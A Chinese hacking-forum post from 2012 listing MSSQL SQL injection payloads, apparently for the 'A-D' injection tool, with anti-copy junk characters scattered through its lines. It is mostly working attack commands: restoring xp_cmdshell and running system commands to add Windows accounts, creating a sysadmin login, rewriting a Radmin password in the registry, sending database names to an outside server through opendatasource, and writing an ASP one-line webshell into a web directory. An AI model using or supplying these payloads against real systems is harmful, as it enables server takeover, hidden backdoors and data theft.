中国网络渗透测试联盟

标题: 阿D常用的一些注入命令 [打印本页]

作者: admin    时间: 2012-9-13 17:26
标题: 阿D常用的一些注入命令
阿D常用的一些注入命令+ W9 j; Z# a: @( F  F3 v8 m4 ]
//看看是什么权限的0 F- X) E& A7 j  C: m1 p" P3 X  X
and 1=(Select IS_MEMBER('db_owner'))
5 U5 C4 b# D3 ?, U) XAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--& Z! b1 R/ \$ d& e& n  R
1 s* ?/ R0 ]+ o  t* v; g
//检测是否有读取某数据库的权限
  D" ]9 R+ S, L1 k% ^9 k% [6 land 1= (Select HAS_DBACCESS('master'))' @$ X6 o8 A' [: m
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --' G8 Q. u7 P/ U- a5 \

! M. R9 ?- i5 T. i( x7 f: b# U1 b; [7 X  E1 v
数字类型' Z+ H0 o' U- z. X4 V+ _" w
and char(124)%2Buser%2Bchar(124)=0" y# X# T9 }, H& _" N. o
; d+ I4 |2 [+ W" d9 k( v" c
字符类型5 G  \7 q* @/ d0 @  [9 t" b
' and char(124)%2Buser%2Bchar(124)=0 and ''='
7 Q9 l" i  b- J5 s
0 X* H8 J6 B. k2 _8 `7 ~7 d: ^- l搜索类型
5 a: S# ?! H- d5 a2 }$ P0 U2 Q- C' and char(124)%2Buser%2Bchar(124)=0 and '%'='" V7 F1 ?; |& ~1 {* d& a% a/ X6 S
0 K5 v% Q  W$ i0 Q1 G
爆用户名& A$ H6 A2 M/ O5 }. i
and user>0
5 g8 q. Z0 `+ C' and user>0 and ''='
0 @$ Q$ l! x- ~( a6 X2 f+ t2 q; A
7 g) s& ?; p3 V8 M& T# ]3 ?检测是否为SA权限8 H$ N, Q$ X1 t+ _7 W2 c
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--5 E$ A: \: o1 R# ^) [# i* |0 j
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --& S; P  A6 X+ w9 q
$ G* w; X- y6 j% P- ]9 e1 Y
检测是不是MSSQL数据库/ Q6 i1 _9 Y: e
and exists (select * from sysobjects);--
% a; U. w: I, D) F, C8 }7 H. P* `& I( m/ Q) T4 E
检测是否支持多行
; {3 c' G! q( f;declare @d int;--
" V1 Z6 |+ y5 M4 s5 x
: M7 B8 Q1 B2 z" W( w1 V) f恢复 xp_cmdshell
' ?$ B" a( W$ Y" b+ h;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
5 J$ U0 t) l$ U3 N; _; s. h% ?
7 T! k4 B9 A' F! X% m. y& U+ C" M7 e  b, r
; Z6 q; L1 Q% P4 V) A1 N" F# Zselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
# D( Y9 T' p' R0 c7 @  @2 i+ r9 @- B6 g+ h4 M
//-----------------------
* J. ]# l' m- L% u//      执行命令* |+ R/ [" _0 u1 E8 \- Q! ^
//-----------------------7 q( G6 M% V1 g/ H! z( |
首先开启沙盘模式:
; G& |, n+ ?# g5 a' i0 Vexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',17 m& z3 S/ f. V+ B$ ]& V2 Q
8 V/ p2 B' G( L7 ]( c/ P9 K
然后利用jet.oledb执行系统命令2 B6 j: l3 `- j: U! T& `
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'), F1 k8 d/ L) c$ F+ `

) U2 J. \1 }4 y; ~8 U( k执行命令
1 R4 ^7 t2 b* G! H$ r$ l8 l9 c;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
5 R: y1 Y6 @7 T/ K7 |, H! T  O2 I: Z0 h
9 i! U" C3 D# C+ M8 BEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'/ q' N# j" z$ \
8 i" j2 y: i0 v8 b) s* D
判断xp_cmdshell扩展存储过程是否存在:: v2 c5 @4 L, x
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')+ i( f& K/ C$ X" d* X# \

! y5 ]  p* M5 L写注册表# @! j% u! u( ^' ?/ z8 b1 y
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1* |+ L0 i  f, ]! F1 D
  R0 H6 a0 \' q) J# a+ S/ R
REG_SZ
  ?) h" N0 d- u
- j$ g& D, V1 K0 y0 U读注册表2 f# `3 r7 p9 X/ j8 z
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
7 G& M* a1 G6 x7 b; V0 W, O7 o- M" L7 r
读取目录内容
$ o& L; M* _5 uexec master..xp_dirtree 'c:\winnt\system32\',1,1, @  z$ E% Q4 s/ Z2 R6 O
5 F' F' c* f# t! l

' Y& a$ Y. `4 t数据库备份
, A$ e/ S! d- S* ^% _0 q. Abackup database pubs to disk = 'c:\123.bak', }" ]6 j4 d" `5 ~

7 z6 X1 D3 j! Y0 e$ i//爆出长度! n. v# R5 p4 ]* B; \# g
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
0 C. r7 V: U8 u' }* i
/ @  r0 i  w" \4 w, R/ P6 a: A2 O3 m4 ]& [& A

% i6 P; [! A) G/ z更改sa口令方法:用sql综合利用工具连接后,执行命令:
1 H" ?' X8 ]8 N; C7 dexec sp_password NULL,'新密码','sa'
+ Q6 z9 l! r. F: y
$ w2 f2 p* ?# I% y0 Y8 h添加和删除一个SA权限的用户test:$ E7 K) e4 n- p
exec master.dbo.sp_addlogin test,ptlove
9 V6 {& f% i$ O2 o0 A. aexec master.dbo.sp_addsrvrolemember test,sysadmin
( S/ m7 L9 T& u+ Y7 t! z1 n, Z& X# c8 K0 G
删除扩展存储过过程xp_cmdshell的语句:
+ `8 N& Z# l4 J0 O; w. ?exec sp_dropextendedproc 'xp_cmdshell'
! p$ ~- g6 c  M! f( D) N1 s9 q7 G. x8 v
添加扩展存储过过程
1 w2 I; {: Q9 Z: x/ ?7 @. I' `EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
: v) _: w/ x# j! y$ P) IGRANT exec On xp_proxiedadata TO public
  |7 j" Y$ t/ u5 Q; _$ u& M
! G6 i# ]8 h6 `5 w( q: v. G1 y5 A7 l
停掉或激活某个服务。
' _6 G/ _4 k1 }/ T4 j4 F. ~* y4 S5 h7 ?9 D
exec master..xp_servicecontrol 'stop','schedule'- ?2 ?  @( ^( S7 i
exec master..xp_servicecontrol 'start','schedule') d7 f0 W3 ^) T( P4 r6 g5 C6 x/ p

1 k+ d3 |, K' y% ?. adbo.xp_subdirs
; i+ j% S4 p; P1 `% ]+ \
% O1 O& q- f& e2 R只列某个目录下的子目录。% b8 K; B/ }& ^9 |  q
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'4 q& g0 ?, A2 a; Q; Q) T9 m

! G$ n. m% L2 o% a6 D6 }( G, t  bdbo.xp_makecab3 q9 Q; Y* w2 \5 S. b2 }

9 r# h' A+ {( N9 Z% j2 {# q! ]# Z将目标多个档案压缩到某个目标档案之内。! K) ?* ~: x' ^+ h8 x. }: I
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
6 v9 l: M2 Q6 S8 M3 T
8 B* s* n  y+ t' w5 |$ zdbo.xp_makecab  A1 j! ]/ x' ^' K( [# w7 T
'c:\test.cab','mszip',1,5 l) O! P4 g) h6 P8 Z; r1 o) e
'C:\Inetpub\wwwroot\SQLInject\login.asp',: i5 U* f+ x8 g0 t+ R# t. a
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
; A( d. }4 a1 b+ D8 w9 i' ?, z% U1 }0 G2 Q( n$ Z% e0 T
xp_terminate_process  k$ r' g4 \( P" ^7 w. A( [

: _; V1 z. k% p6 V& n& _停掉某个执行中的程序,但赋予的参数是 Process ID。: i8 y0 y, H1 L4 K) I
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
7 A9 m4 J- z; z* u' g
: }3 m6 \3 _8 T  [xp_terminate_process 2484
/ `5 l- o3 v+ H- e
  d+ K% f9 I2 D8 }& V! lxp_unpackcab
! w' b4 A- ]  k- b% d# W% L) F/ a3 Y3 s3 @
解开压缩档。9 A: t; a  H3 P# T1 S- t, e/ e: \
8 z; [- d9 s! O  _* M9 E, v- [
xp_unpackcab 'c:\test.cab','c:\temp',1+ W( @/ W/ K0 X  E6 y6 i: _1 o3 `

: a% y# m0 C3 E  H7 P
$ b/ c  j% Y& ^+ O1 M9 u8 x) {某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
- `4 Z: t/ ?0 i8 v" f0 G: B! w+ F( P0 E9 W
create database lcx;
' g, j  K) q/ n3 l. UCreate TABLE ku(name nvarchar(256) null);
& m2 A1 J5 |/ [( h  Y4 s6 C0 R4 O4 {9 bCreate TABLE biao(id int NULL,name nvarchar(256) null);
, X+ J4 v/ w8 @) i6 j/ z. N2 a) @/ |1 U$ B( _% I
//得到数据库名- s7 B, ?4 ~6 b! M) z( ^5 k4 P
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases( T( P$ O8 r+ {. C8 m, m
9 J# w. k4 Z2 O5 N- ]7 k
1 T& ^4 y' \& k& m2 J; \
//在Master中创建表,看看权限怎样
1 R& w8 U. F: R1 I5 |: B+ \  r1 _8 c& n: i4 pCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
" {; r. X+ E2 [* q5 D: w& r5 t9 S
0 J. ]) l+ s; w: a4 y/ A- G, F- s用 sp_makewebtask直接在web目录里写入一句话马:+ B- K3 z5 t. }+ a
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--- e  U1 a( o7 H# h3 X4 S8 O

+ [, `( o5 q' t: p6 w//更新表内容( w. P! a' t" z; A
Update films SET kind = 'Dramatic' Where id = 123
+ f5 j7 Q: g) h4 |0 C0 n5 L  O
3 i- T# L: M. {$ o- M4 E//删除内容) k2 e# |# D/ t1 C% |
delete from table_name where Stockid = 3




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2